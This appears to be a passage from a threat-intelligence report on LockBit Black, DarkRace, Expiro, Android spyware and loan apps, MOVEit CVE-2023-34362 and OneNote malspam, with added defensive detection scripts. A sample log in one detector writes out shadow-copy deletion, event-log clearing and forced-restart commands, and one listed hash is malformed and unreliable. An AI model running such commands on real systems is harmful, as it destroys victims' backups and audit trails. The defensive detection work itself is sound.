Since the dissolution of the Conti ransomware group, the LockBit group has emerged as a dominant force in the ransomware landscape. The transition is marked by new extortion techniques and the launch of a bug bounty program. The LockBit 3.0 variant examined here, specifically the Black variant, combines a highly effective infection vector with a sophisticated attack chain characterized by significant anti-forensic measures: simultaneous clearing of event logs, termination of multiple processes and deletion of services.

The group uses various tactics for initial network access, such as SMB brute-force attacks from diverse IPs, followed by lateral movement across the victim's network to execute the ransomware payload. It uses the Sysinternals tool PsExec to execute malicious BAT files on a single system, leaving traces of modifications to RDP and authentication settings together with the disabling of antivirus solutions; PsExec is also leveraged for lateral movement within the victim's network.

The malware encrypts with a multi-threaded approach, selectively targeting shared drives. To execute the payload successfully, a valid key must be passed with the command-line option '-pass'; without it the binary does not run, which also defeats automated sandboxes that detonate the sample bare. Encrypted files bear the distinctive ".zbzdbs59d" extension, suggesting that the builder generates each payload with a unique, random string. Where admin privileges are lacking at execution time, the malware uses the CMSTPLUA COM interface to bypass the UAC prompt, leveraging the legitimacy of the Windows Connection Manager components. Anti-debugging techniques are also observed, along with changing the desktop wallpaper.

Despite the leak of its builder, LockBit 3.0 has risen to the forefront of the Ransomware-as-a-Service (RaaS) model, attributed to its bug bounty program and innovative extortion tactics. Remarkably, the threat has persisted even as other malicious actors create their own variants from the leaked builder.
LockBit Black attack chain

01 Initial access: SMB brute force of unprotected systems.
02 Execution of malicious BAT scripts: after initial access via SMB brute forcing, malicious BAT files (openrdp.bat, mimon.bat, auth.bat, etc.) are executed to modify authentication settings and disable AV. Windows Defender specifically is disabled for evasion.
03 PsExec is used to run the ransomware.
04 In-memory decryption of PE sections: the .text, .data and .pdata sections are decrypted in memory (the report shows pseudo code for this routine).
05 Privilege escalation: UAC bypass using CMSTPLUA.
06 Anti-debugging: ThreadHideFromDebugger hinders dynamic analysis by stopping debug information from the ransomware thread reaching an attached debugger.
07 Logs are disabled by setting multiple registry subkeys under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels to 0. Processes terminated include SecurityHealthSystray.exe; the mutex created during execution was 13fd9a89b0eede26272934728b390e06.
08 Encryption of shared drives: files are encrypted by multiple threads, each filename is replaced with a random string and the extension is appended, with full encryption completed in under 2 minutes. Before encryption the ransom note is created in every directory except Program Files and the Windows directory, which are not encrypted.
09 Ransom note on the screensaver: "All your important files are stolen and encrypted! You must find zbzdbs59d.README.txt file and follow the instruction! LockBit Black"
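Each step of the chain above leaves a host-level trace that ordinary telemetry records before the logs are switched off: PsExec launching a batch file, the WINEVT channel keys being set to 0, SecurityHealthSystray.exe being killed, and a README note appearing next to files with a nine-character random extension. The following correlation is an added example, not SEQRITE's detection content: it consumes constructed Sysmon-style events (IDs 1, 5, 11 and 13; host names, paths and the share are assumed) and raises a chain verdict when several of these behaviours coincide on one host, deriving the encrypted-file extension from the note's name rather than hard-coding ".zbzdbs59d", since the builder randomizes it per payload.

```python
"""Correlates the LockBit Black anti-forensic behaviour described above across Sysmon-style host
events. Added example, not SEQRITE's detection content; the events below are constructed."""
import ntpath
import re
from collections import defaultdict

WINEVT_ENABLED = re.compile(r"\\WINEVT\\Channels\\[^\\]+\\Enabled$", re.IGNORECASE)
RANSOM_NOTE = re.compile(r"^([a-z0-9]{9})\.README\.txt$", re.IGNORECASE)
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe", "psexesvc.exe"}
MIN_DISABLED_CHANNELS = 3   # one channel may be an admin tweak; a sweep across channels is not

# Constructed events: id 1 process create, 5 process terminate, 11 file create, 13 registry value set.
EVENTS = [
    {"host": "WS01", "id": 1, "image": r"C:\Tools\PsExec.exe",
     "cmdline": r"PsExec.exe \\WS01 -s cmd /c C:\temp\auth.bat"},
    {"host": "WS01", "id": 13, "details": "DWORD (0x00000000)",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Security\Enabled"},
    {"host": "WS01", "id": 13, "details": "DWORD (0x00000000)",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\System\Enabled"},
    {"host": "WS01", "id": 13, "details": "DWORD (0x00000000)",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Sysmon/Operational\Enabled"},
    {"host": "WS01", "id": 5, "image": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"host": "WS01", "id": 11, "target": r"\\FS01\finance\zbzdbs59d.README.txt"},
    {"host": "WS01", "id": 11, "target": r"\\FS01\finance\Q3-forecast.xlsx.zbzdbs59d"},
    {"host": "WS01", "id": 11, "target": r"\\FS01\finance\payroll.docx.zbzdbs59d"},
    {"host": "WS02", "id": 13, "details": "DWORD (0x00000001)",   # benign: channel enabled
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Application\Enabled"},
    {"host": "WS02", "id": 11, "target": r"C:\Users\a\Documents\notes.txt"},
]


def correlate(events):
    """Return {host: {"indicators": [...], "chain": bool}} for hosts showing LockBit Black behaviour."""
    per_host = defaultdict(lambda: {"disabled": 0, "psexec": False, "killed": False,
                                    "notes": set(), "files": []})
    for e in events:
        h = per_host[e["host"]]
        if e["id"] == 13 and WINEVT_ENABLED.search(e["target"]) and e["details"].endswith("(0x00000000)"):
            h["disabled"] += 1                                    # step 07: event log channel off
        elif e["id"] == 1 and ntpath.basename(e["image"]).lower() in PSEXEC_IMAGES:
            h["psexec"] = True                                    # steps 02/03: PsExec execution
        elif e["id"] == 5 and ntpath.basename(e["image"]).lower() == "securityhealthsystray.exe":
            h["killed"] = True                                    # step 07: security UI terminated
        elif e["id"] == 11:
            name = ntpath.basename(e["target"])
            m = RANSOM_NOTE.match(name)
            if m:
                h["notes"].add(m.group(1).lower())                # the extension is the note's prefix
            else:
                h["files"].append(name.lower())
    result = {}
    for host, h in per_host.items():
        hits = []
        if h["disabled"] >= MIN_DISABLED_CHANNELS:
            hits.append("eventlog-channels-disabled")
        if h["psexec"]:
            hits.append("psexec-execution")
        if h["killed"]:
            hits.append("security-ui-terminated")
        encrypted = [f for f in h["files"] if any(f.endswith("." + ext) for ext in h["notes"])]
        if h["notes"] and encrypted:
            hits.append("ransom-note-with-encrypted-files")       # step 08
        if hits:
            result[host] = {"indicators": hits, "chain": len(hits) >= 3}
    return result


if __name__ == "__main__":
    for host, verdict in correlate(EVENTS).items():
        print(host, verdict)
```

Because the registry sweep precedes the encryption, a detection that fires on the eventlog-channels-disabled indicator alone gives the responder a window of minutes before the shared drives are touched; the chain verdict is for confirmation after the fact.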
Fake applications disguised as legitimate ones

Criticality: High | Targets: Android Users | Countries Affected: India

In a recent alert, the Indian Railway Catering and Tourism Corporation (IRCTC) cautioned users about a malicious Android app, irctcconnect.apk, circulating on messaging platforms such as WhatsApp and Telegram. The fraudulent app, masquerading as an official IRCTC app, functions as spyware: it can steal Facebook and Google credentials, extract codes from Google Authenticator, track GPS and network location, record video through the Camera API, and collect information about the applications installed on the device. IRCTC's advisory emphasized the app's malicious nature and warned users against downloading it. The phishing links, distributed widely, impersonated IRCTC officials to trick users into revealing sensitive net banking credentials, including UPI details and credit/debit card information. Antivirus products detect applications of this kind, which share code with the SpyNote family, as Android.SpyNote.GEN. An APK forwarded over a chat app is itself the warning sign: a sideloaded package bypasses the vetting an app store applies.
Figure: on screen, the fake app disguised as the legitimate IRCTC app and seeking permissions on the infected device; behind the screen, Android.SpyNote.GEN stealing social media credentials, collecting location information and collecting installed-application info.

Indicators of Compromise (IOCs), Android.SpyNote.GEN:
1. 45c154af52c65087161b8d87e212435a
2. c01566f5feb7244ed4805e2855ebdc400
3. c77435e6e77152d24e86eb75e1f04d75
Battling the death trap of malicious loan apps

Criticality: Medium | Targets: Android Users | Countries Affected: India

In the age of instant finance at our fingertips, loan apps have reshaped how we access funds. Beneath the convenience, however, lies a concerning trend: malicious apps linked to tragic outcomes. A spate of deaths has occurred across India in the last 2-3 years. The reason: seemingly genuine loan applications with sinister motives behind them. The victims took loans from such apps and ended up taking their own lives, driven by harassment, blackmail and abuse by the operators of these apps.

These applications offer small loans without much paperwork but charge heavy interest rates and often resort to extortion through morphed photographs and cyberbullying. Many compel users to share unnecessary information, including contact details, photographs and location. The operators then use these details to harass the victim with defamatory messages and manipulated photographs sent to their contacts. This harassment drives some users into depression and suicide attempts out of fear of public humiliation.

These applications request permissions, some of which are unnecessary for a lending app, such as android.permission.BLUETOOTH and android.permission.READ_CALL_LOG.

Countermeasures

Google has removed 3,500 such applications from the Play Store and now requires developers to set the application category to 'finance', state the minimum and maximum repayment period, and state the maximum annual percentage rate, including interest and other fees. Google has also barred loan apps that require repayment in full within 60 days, and personal loan applications are no longer allowed to access sensitive data such as photos and contacts. The Reserve Bank of India (RBI) has published guidelines stating that Regulated Entities (REs) must ensure their Digital Lending Applications (DLAs) do not access mobile phone resources such as media, contact lists, call logs or telephony functions.
  • 49. Reported loan applications
Indicators of compromise (IoC)
Application Name | Package Name
Future Rupee – Credit Loan | com.future.cash.rupee
InstaNova – Easy Instant Loans | com.wavfge.magfin
Mobile Money | com.mobile.money.cash
Salina Loan | com.salina.loan.mountain
CA loan | com.assistance.career.loansindia
Fast Loan- Speed Cash Loan | com.fastloan.cashloan.instantloan.loanapp
Toop Loan | in.azme.high.top.loan
Credit Wallet: Easy Loans | com.ceditwallet.now
Asher Loan | com.asher.loan.cocla
Permissions declared by the apps: READ_PHONE_STATE, CAMERA, READ_SMS, CHANGE_WIFI_STATE, ACCESS_WIFI_STATE, INTERNET, ACCESS_COARSE_LOCATION, BLUETOOTH, READ_CALL_LOG
[Figures: process followed by these applications to retrieve sensitive information: run-time contact access; accessing external storage; location access code]
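A manifest triage check for the permission problem described on the two slides above: it lists the android.permission.* entries an APK declares and flags those that the Google Play loan-app policy and the RBI digital-lending guidelines say a personal loan app should not hold. This is an added example, not the report's or SEQRITE's tooling; the permission-to-category mapping and the sample manifest are constructed (the manifest reuses the permission set and one package name from the report's table, not the real app's manifest).

```python
"""Flag loan-app permissions that fall outside the Google Play / RBI limits."""
import re

# Assumed mapping from permission to the restricted resource category named in the
# report (media/photos, contact list, call logs, telephony, SMS, location, unrelated hardware).
DISALLOWED = {
    "READ_CONTACTS": "contact list",
    "READ_CALL_LOG": "call logs",
    "READ_SMS": "SMS",
    "RECEIVE_SMS": "SMS",
    "READ_PHONE_STATE": "telephony",
    "CALL_PHONE": "telephony",
    "READ_EXTERNAL_STORAGE": "media / photos",
    "READ_MEDIA_IMAGES": "media / photos",
    "CAMERA": "media / photos",
    "ACCESS_COARSE_LOCATION": "location",
    "ACCESS_FINE_LOCATION": "location",
    "BLUETOOTH": "unrelated hardware",
}

USES_PERMISSION = re.compile(
    r'<uses-permission\s+android:name="android\.permission\.([A-Z_]+)"')


def declared_permissions(manifest_xml: str) -> list:
    """Return the android.permission.* names declared in a manifest, deduplicated, in order."""
    seen = []
    for name in USES_PERMISSION.findall(manifest_xml):
        if name not in seen:
            seen.append(name)
    return seen


def audit_loan_app(package: str, manifest_xml: str) -> dict:
    """Audit one app: which declared permissions touch restricted resources."""
    perms = declared_permissions(manifest_xml)
    flagged = {p: DISALLOWED[p] for p in perms if p in DISALLOWED}
    return {
        "package": package,
        "declared": perms,
        "flagged": flagged,
        "verdict": "non-compliant" if flagged else "ok",
    }


# Constructed manifest: permission set from the report's slide, package name from its table.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.future.cash.rupee">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
  <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
  <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
  <uses-permission android:name="android.permission.BLUETOOTH"/>
  <uses-permission android:name="android.permission.READ_CALL_LOG"/>
</manifest>"""

if __name__ == "__main__":
    report = audit_loan_app("com.future.cash.rupee", SAMPLE_MANIFEST)
    print(report["package"], "->", report["verdict"])
    for perm, why in report["flagged"].items():
        print("  %-25s %s" % (perm, why))
```

The same function can be run over the output of `aapt dump xmltree` or a decoded AndroidManifest.xml for each package in the table to produce a per-app list of the permissions the guidelines prohibit.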
  • 50. Expiro: Old virus poses a new challenge
Expiro is no stranger in the family of viruses, having existed since 2011. However, over the last one and a half years, a sudden surge in Expiro cases has been witnessed, primarily targeting regions in India. There are two different versions of Expiro: one involves multi-layered, complex code to retrieve the patched code from the infected file, and the other modifies the imports of the clean file. Despite the differences, both versions share the common goal of infecting executable files on the system by appending virus code at the end. Upon execution, the infector code runs, and the malicious call is then patched with a new address so that the benign code executes. Restoring the file to its original form proves challenging due to the compressed and encrypted nature of the overwritten code, which is decrypted at runtime through highly obfuscated decompression and decryption routines.
Criticality: High
Sectors Targeted: Power and Energy
Regions: South Asia
The infection routine is executed in a manner that allows user applications to run seemingly normally, unbeknownst to the user. This Expiro variant can check network-mapped drives, infecting executable files on those drives and potentially spreading the infection across the network. Additionally, observations indicate this variant performing backdoor activity by connecting to remote servers. Expiro can receive commands from these servers and execute them on the infected system, including installing other malware capable of stealing and uploading sensitive information.
  • 51. Risks posed by Expiro
Expiro possesses capabilities to accept commands from its controller and execute them on infected systems. With successful commands delivered to victims, Expiro can:
- Install other malware (keyloggers, spyware, ransomware, etc.)
- Steal and upload sensitive information
- Disable security software on the systems
- Hijack servers
- Establish itself to act at a later point in time
[Chart: Power and Energy sector had the maximum detections of Expiro attacks]
The infection vector:
- Cracked or patched versions of software
- Drive-by download: file download upon visiting an infected website
- Dropped by some other malware, USB drives, malvertising campaigns, etc.
Infects both 32-bit and 64-bit executable files.
File Infection Process
The new variant of Expiro is a type of "Appender" virus, which infects files by inserting virus code at the end of the file, specifically in the last section of the executable. The new variant patches a call in the executable section that further jumps to the last section, at the offset where the malicious virus code is present. The code to calculate and select which call to patch is highly obfuscated. Upon analysing multiple files of this variant, it was found that the decompressed buffer for most of the infected files remains the same while the wrapper keeps changing. After successful decompression and decryption, the infected application is launched, and it starts infecting other executables present in the system. Due to the obfuscated call-patching routine and the encrypted virus code, it is challenging to clean infected files with complete accuracy.
[Figure: File Infection Process (Source)]
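A triage heuristic for the appender behaviour described above: parse the PE section table and report when the last section carries executable code where none should be, which is the footprint an appender leaves regardless of how the patched call is obfuscated. This is an added example and not SEQRITE's detection logic; the allow-list of normal code section names, the flagging rules and the constructed PE skeletons used as input are all assumptions.

```python
"""Heuristic check for appender-style infection of a PE file's last section."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
EXPECTED_CODE_NAMES = {b".text", b"CODE", b".code"}   # assumed allow-list of normal code sections


def parse_sections(data: bytes):
    """Return (AddressOfEntryPoint, [section dicts]) from a PE file's headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry = struct.unpack_from("<I", data, opt + 16)[0]      # AddressOfEntryPoint (RVA)
    sections, pos = [], opt + size_opt
    for _ in range(num_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, pos)
        chars = struct.unpack_from("<I", data, pos + 36)[0]
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "chars": chars})
        pos += 40
    return entry, sections


def appender_indicators(data: bytes) -> list:
    """Reasons the last section looks like appended infector code (empty list = nothing found)."""
    entry, sections = parse_sections(data)
    last = sections[-1]
    reasons = []
    if last["chars"] & IMAGE_SCN_MEM_EXECUTE:
        if last["name"] not in EXPECTED_CODE_NAMES:
            reasons.append("last section %r is executable" % last["name"])
        if last["chars"] & IMAGE_SCN_MEM_WRITE:
            reasons.append("last section is writable and executable")
    # Expiro patches a call inside the code section rather than the entry point, so this
    # extra rule only catches the cruder variant where the entry point itself was moved.
    if last["va"] <= entry < last["va"] + max(last["vsize"], last["raw_size"]):
        reasons.append("entry point lies in the last section")
    return reasons


def build_pe(sections, entry: int) -> bytes:
    """Constructed PE32 skeleton (headers plus zeroed section bodies) for testing only;
    sections is a list of (name, virtual address, characteristics). Not a loadable image."""
    e_lfanew, size_opt, num = 0x80, 0xE0, len(sections)
    hdr = bytearray(b"MZ" + b"\0" * (0x3C - 2)) + struct.pack("<I", e_lfanew)
    hdr += b"\0" * (e_lfanew - len(hdr)) + b"PE\0\0"
    hdr += struct.pack("<HHIIIHH", 0x14C, num, 0, 0, 0, size_opt, 0x102)   # COFF header
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 16, entry)       # AddressOfEntryPoint
    hdr += opt
    raw_ptr = len(hdr) + 40 * num
    for name, va, chars in sections:
        hdr += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), 0x1000, va,
                           0x200, raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += 0x200
    return bytes(hdr) + b"\0" * (raw_ptr - len(hdr))


CLEAN_PE = build_pe([
    (b".text", 0x1000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x2000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
], entry=0x1000)

# Same layout with an extra executable+writable section appended, as an appender leaves it
# (section name constructed for the example; entry point left in .text as Expiro does).
INFECTED_PE = build_pe([
    (b".text", 0x1000, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (b".data", 0x2000, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (b".vir0", 0x3000, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
], entry=0x1000)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PE), ("infected", INFECTED_PE)):
        print(label, appender_indicators(blob) or ["no appender indicators"])
```

Packers and some installers legitimately produce an executable last section, so treat a hit as a prompt for closer analysis rather than a verdict.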
  • 52. DarkRace Ransomware: A deep dive into its techniques and impact
Brief: DarkRace ransomware is a derivative of the infamous LockBit ransomware, borrowing heavily from its leaked source code.
How it spreads:
- Cracked Software Infiltration: the ransomware discreetly enters systems through cracked software installations using obfuscator technology.
- Phishing Email Attacks: DarkRace employs social engineering in phishing emails, deceiving users into activating exploit kits and initiating ransomware attacks.
The section below delves into the key characteristics and tactics employed by DarkRace, shedding light on its intricate functionalities.
Criticality: High
Sectors Targeted: Manufacturing, Financial, Transportation, Science & Technology
Regions: Europe and United States
Mutex Checks: Efficient Resource Utilization and Stealth Operation
DarkRace implements mutex checks on infected systems, a strategic measure to prevent multiple infections on the same system. This not only ensures efficient use of resources but also mitigates the risk of detection arising from excessive activity. By employing mutex checks, DarkRace operates stealthily, enhancing its overall effectiveness in compromising targeted systems.
Runtime Decryption: Unveiling Crucial Information Dynamically
The ransomware incorporates runtime decryption of XML data encompassing critical information such as the ransom note and the whitelisted files, folders, and extensions. This dynamic decryption approach allows DarkRace to adapt its tactics at runtime, maintaining flexibility and further complicating efforts to counter its malicious activities.
Encryption using Salsa20: Speed and Security in File Compromise
DarkRace leverages the Salsa20 stream cipher, renowned for its speed and security, as its encryption algorithm of choice. This encryption is applied to the files on the victim's system, appending a random extension to them. This renders the files inaccessible until a ransom is paid to acquire the decryption key, adding a layer of complexity to recovery efforts.
Post Encryption Measures: Heightened Security Evasion and Covering Tracks
Post-encryption, DarkRace adopts additional measures to make recovery more challenging. This includes the deletion of shadow copies, hindering traditional recovery methods. Going a step further, DarkRace terminates processes that might interfere with its operation or could potentially be used to recover encrypted data. After executing its malicious activities, the ransomware deletes its own files and restarts the system. This deliberate act adds an extra layer of complexity, making it exceptionally challenging for cybersecurity experts to trace its activities and develop effective countermeasures.
  • 53. DarkRace Ransomware: summary of techniques
Mutex Checks: prevents multiple infections on the same system for efficient resource utilization; avoids detection by limiting excessive activity.
Runtime Decryption: decrypts XML data, revealing information like ransom notes and whitelisted files; enhances flexibility and adaptability in handling encrypted content.
Encryption with Salsa20: utilizes the Salsa20 stream cipher for swift and secure file encryption; appends a random extension to files, rendering them inaccessible until ransom payment.
Post Encryption Measures: deletes shadow copies to hinder recovery efforts; terminates interfering processes, covers its tracks, and restarts the system for added evasion.
[Figures: checking the existing mutex object; decrypted XML format string; getting the drives; deleting the event logs; deleting the shadow copy; retrieving services from the XML data; ransom note]
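The post-encryption measures listed on the two slides above (shadow copy deletion, event log clearing, terminating interfering processes, forced restart) are individually common administrative actions but rarely occur together on one host within minutes. The following added example correlates them in process-creation telemetry; it is not the report's or SEQRITE's detection content, and the log line format and the command-line patterns are assumptions, since the report does not reproduce DarkRace's exact commands.

```python
"""Correlate ransomware post-encryption behaviours across process-creation events."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed command-line patterns for each behaviour (standard Windows tooling).
PATTERNS = {
    "shadow_copy_delete": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "event_log_clear": re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I),
    "process_kill": re.compile(r"taskkill(\.exe)?\s.*(/f\b|/im\b)", re.I),
    "forced_restart": re.compile(r"shutdown(\.exe)?\s.*(/r\b|-r\b)", re.I),
}
WINDOW = timedelta(minutes=10)   # how close together the behaviours must be
MIN_BEHAVIOURS = 3               # distinct behaviours needed before alerting

# Assumed event format: "<date> <time> host=<name> user=<name> cmd=<command line>"
LINE = re.compile(r"^(?P<ts>\S+ \S+) host=(?P<host>\S+) user=\S+ cmd=(?P<cmd>.*)$")


def classify(cmd: str) -> list:
    """Behaviour tags matched by one command line (usually zero or one)."""
    return [tag for tag, pat in PATTERNS.items() if pat.search(cmd)]


def correlate(lines, window=WINDOW, min_behaviours=MIN_BEHAVIOURS) -> dict:
    """Return {host: sorted behaviour tags} for hosts showing >= min_behaviours within window."""
    per_host = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        for tag in classify(m["cmd"]):
            per_host[m["host"]].append((ts, tag))
    alerts = {}
    for host, events in per_host.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            # Distinct behaviours in the window opening at this event.
            tags = {tag for t, tag in events[i:] if t - t0 <= window}
            if len(tags) >= min_behaviours:
                alerts[host] = sorted(tags)
                break
    return alerts


# Constructed sample telemetry: one host shows the full post-encryption sequence,
# another shows a lone administrative log clear that should not alert.
SAMPLE_EVENTS = [
    "2023-11-02 09:00:00 host=FS-02 user=CORP\\admin cmd=wevtutil.exe cl Application",
    "2023-11-02 10:00:41 host=WS-17 user=jdoe cmd=notepad.exe C:\\Users\\jdoe\\report.txt",
    "2023-11-02 10:01:14 host=WS-17 user=jdoe cmd=vssadmin.exe delete shadows /all /quiet",
    "2023-11-02 10:01:20 host=WS-17 user=jdoe cmd=wevtutil.exe cl Security",
    "2023-11-02 10:02:05 host=WS-17 user=jdoe cmd=taskkill.exe /F /IM sqlservr.exe",
    "2023-11-02 10:03:40 host=WS-17 user=jdoe cmd=shutdown.exe /r /t 0 /f",
]

if __name__ == "__main__":
    for host, tags in correlate(SAMPLE_EVENTS).items():
        print("ALERT %s: %s" % (host, ", ".join(tags)))
```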
  • 54. Critical Zero Day Vulnerability in MOVEit Transfer
MOVEit Transfer is widely recognized as a secure and popular managed file transfer program used by enterprises to safely transfer data using protocols such as SFTP, SCP, and HTTP-based uploads. This specific vulnerability, referred to as CVE-2023-34362, heightens the risk of unauthorized access and exploitation of elevated privileges within the system.
Criticality: High
Sectors Targeted: Government, Finance, Media, Aviation, Healthcare
Countries Affected: United States
It initiates from a SQL injection vulnerability that could grant unauthorized individuals access to the MOVEit Transfer database if exploited. The vulnerability is actively targeted, with attackers leveraging HTTP or HTTPS channels to exploit it. After successfully exploiting the vulnerability, the attacker deploys a web shell (human2.aspx), a hidden entry point for future access. Through this deployed web shell, the threat actor gains continued backdoor access to the compromised system, establishing a means for continuous control. Subsequently, they initiate data exfiltration activities, secretly extracting sensitive information without authorization.
Observed patterns of requests
Certain patterns of requests are frequently observed when attempting to implant malicious web shells; these patterns often serve as indicators of compromise. The sequence covers the file upload, SQL injection and web shell access stages:
- GET / - port 443
- POST /guestaccess.aspx - port 443
- POST /api/v1/token - port 443
- GET /api/v1/folders - port 443
- POST /api/v1/folders/[PATH]/files uploadType=resumable - port 443
- POST /machine2.aspx - port 80
- POST /moveitisapi/moveitisapi.dll - port 443
- POST /guestaccess.aspx - port 443
- PUT /api/v1/folders/[PATH]/files uploadType=resumable&fileId=[FILEID] - port 443
- POST /machine2.aspx - port 80
- GET /human2.aspx - port 443
Steps for prevention
- Update MOVEit Transfer: upgrade to the patched versions MOVEit Transfer 2023.0.1, 2022.1.5, 2022.0.4, 2021.1.4, 2021.0.6.
- Disable HTTP and HTTPS traffic: modify firewall rules to block incoming traffic on ports 80 and 443, preventing potential attacks on MOVEit Transfer.
- Remove unauthorized files and users: delete "human2.aspx" and scrutinize and eliminate
The software provider quickly developed a patch to fix the identified vulnerability, ensuring users can update their MOVEit Transfer installations and protect their systems from potential exploitation.
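The observed request pattern above can be turned into a retrospective check of the MOVEit Transfer web server logs: any request for the web shell path is reported on its own, and the ordered stages of the sequence are tracked per client address. This is an added example, not the report's or the vendor's tooling; the IIS-style log field order and the sample lines are constructed assumptions.

```python
"""Scan MOVEit Transfer access logs for the CVE-2023-34362 exploitation request pattern."""
import re
from collections import defaultdict

# Assumed W3C/IIS-style field order: date time client-ip method uri-stem server-port status
LOG = re.compile(r"^(?P<ts>\S+ \S+) (?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) "
                 r"(?P<port>\d+) (?P<status>\d+)$")

WEBSHELL_PATHS = {"/human2.aspx"}
# Ordered stages from the observed pattern: (method, path prefix, port).
CHAIN = [
    ("POST", "/guestaccess.aspx", 443),
    ("POST", "/api/v1/token", 443),
    ("POST", "/api/v1/folders/", 443),            # resumable file upload
    ("POST", "/machine2.aspx", 80),
    ("POST", "/moveitisapi/moveitisapi.dll", 443),
    ("GET", "/human2.aspx", 443),                 # web shell access
]


def parse(line: str):
    m = LOG.match(line)
    return m.groupdict() if m else None


def scan(lines) -> dict:
    """Return {client ip: [findings]} for web shell hits and completed exploitation chains."""
    findings = defaultdict(list)
    progress = defaultdict(int)          # index of the next CHAIN stage expected per client
    for line in lines:
        r = parse(line)
        if r is None:
            continue
        path = r["path"].split("?", 1)[0].lower()
        port = int(r["port"])
        if path in WEBSHELL_PATHS:
            findings[r["ip"]].append("%s web shell request %s %s" % (r["ts"], r["method"], path))
        i = progress[r["ip"]]
        if i < len(CHAIN):
            method, prefix, want_port = CHAIN[i]
            if r["method"] == method and path.startswith(prefix) and port == want_port:
                progress[r["ip"]] = i + 1
                if i + 1 == len(CHAIN):
                    findings[r["ip"]].append("%s full exploitation sequence observed" % r["ts"])
    return dict(findings)


# Constructed log lines: one client walks the whole sequence, another is an ordinary user.
SAMPLE_LOG = [
    "2023-06-01 02:11:03 198.51.100.7 GET / 443 200",
    "2023-06-01 02:11:04 198.51.100.7 POST /guestaccess.aspx 443 200",
    "2023-06-01 02:11:05 198.51.100.7 POST /api/v1/token 443 200",
    "2023-06-01 02:11:06 198.51.100.7 GET /api/v1/folders 443 200",
    "2023-06-01 02:11:08 198.51.100.7 POST /api/v1/folders/123/files?uploadType=resumable 443 200",
    "2023-06-01 02:11:09 198.51.100.7 POST /machine2.aspx 80 200",
    "2023-06-01 02:11:10 198.51.100.7 POST /moveitisapi/moveitisapi.dll 443 200",
    "2023-06-01 02:11:12 198.51.100.7 GET /human2.aspx 443 200",
    "2023-06-01 08:30:00 192.0.2.44 GET / 443 200",
    "2023-06-01 08:30:05 192.0.2.44 POST /guestaccess.aspx 443 200",
]

if __name__ == "__main__":
    for ip, notes in scan(SAMPLE_LOG).items():
        for note in notes:
            print(ip, note)
```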
  • 55. OneNote Exploits: The latest weapon in cybercrime
OneNote, with a significant installation base worldwide and extensive use for note-keeping, is facing a new malware distribution method that raises concerns among users. Malicious actors are disguising malware as OneNote files and distributing them through email and other messaging platforms. These malicious spam (malspam) emails masquerade as various documents, including DHL shipping notifications, invoices, ACH remittance forms, mechanical drawings, and shipping documents. The attackers embed malicious Visual Basic Script (VBS) attachments into OneNote notebooks. When an unsuspecting user double-clicks on these attachments, the malware is launched. Notably, various Remote Access Trojans (RATs) like AsyncRAT, Quasar RAT, and NetWire have been observed using OneNote files for their distribution. Many of these OneNote files contain batch scripts that download the payload using PowerShell. Additionally, malware families such as QBot, IcedID, and Emotet have explored this file type.
Criticality: High
Sectors Targeted: Windows Users
Regions: India, China, European Union, United States, & Africa
